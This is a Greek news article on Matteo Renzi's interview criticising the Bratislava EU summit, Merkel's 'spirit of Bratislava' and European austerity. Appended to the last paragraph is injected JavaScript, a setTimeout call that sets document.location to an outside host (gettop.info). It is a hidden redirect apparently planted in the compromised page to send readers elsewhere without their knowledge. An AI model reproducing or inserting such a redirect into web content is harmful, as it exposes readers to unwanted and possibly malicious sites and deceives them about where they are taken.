Ρέντσι: Αντί για πνεύμα της Μπρατισλάβα, θα συζητήσουμε για φάντασμα της Ευρώπης

0
6

 

Καυστικές απαντήσεις έδωσε ο Ιταλός πρωθυπουργός σχετικά με τα αποτελέσματα και το περιεχόμενο της συνόδου στην Μπρατισλάβα. Αφού τη χαρακτήρισε «χαμένη ευκαιρία»,  σε συνέντευξή του στην εφημερίδα Corriere della Sera ο Ιταλός πρωθυπουργός, υπογράμμισε: «Εκφράσθηκα με σκληρό τρόπο, όταν στο κείμενο που παρουσιάσθηκε δεν βρήκα ούτε μια σειρά η οποία να αφορά την Αφρική και την μετανάστευση, αλλά ούτε την Ευρώπη και την κοινωνική ανάπτυξη. Για να δοθεί νέα ώθηση, πρέπει να αλλάξουμε την πορεία την οποία ακολουθεί η Ευρώπη, όχι να αλλάξουμε το μέγαρο στο οποίο διεξάγεται η σύνοδος. Κάποιοι κάνουν ότι δεν καταλαβαίνουν πως το μεταναστευτικό δεν εξαντλείται στη συμφωνία -η οποία πρέπει να τύχει επαλήθευσης- με την Τουρκία. Πρέπει και να αναγνωρίσουμε ότι η ευρωπαϊκή λιτότητα απέτυχε, ενώ η αμερικανική πολιτική επενδύσεων έκανε την προεδρία Ομπάμα να πετύχει ρεκόρ σε θέσεις εργασίας. Δεν πρόκειται για επίθεση, αλλά για καταγραφή της πραγματικότητας».

Ο Ιταλός πρωθυπουργός τόνσε ότι δεν έχει κάποιο θέμα με τους Μέρκελ και Ολάντ, αλλά υπογράμμισε ότι «η Ιταλία δίνει τη συμβολή της όταν γίνεται μια σοβαρή προσπάθεια. Αν θέλουμε να περάσουμε τα απογεύματα γράφοντας κείμενα χωρίς ψυχή και ορίζοντα, μπορούν να το κάνουν και μόνοι τους».

Όσον αφορά στη Μέρκελ, ο κ. Ρέντσι είπε: «Δεν ξέρω σε τι αναφέρεται η καγκελάριος Μέρκελ όταν μιλά για πνεύμα της Μπρατισλάβα. Αν προχωρήσουμε με τον τρόπο αυτό, αντί για το πνεύμα της Μπρατισλάβα, θα συζητήσουμε για το φάντασμα της Ευρώπης. Στην Μπρατισλάβα κάναμε μια ωραία κρουαζιέρα στον Δούναβη, όλοι μαζί. Αλλά εγώ ήλπιζα να απαντήσω στην κρίση που προκλήθηκε από το Brexit, όχι μόνο να κάνω έναν γύρο με βάρκα». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here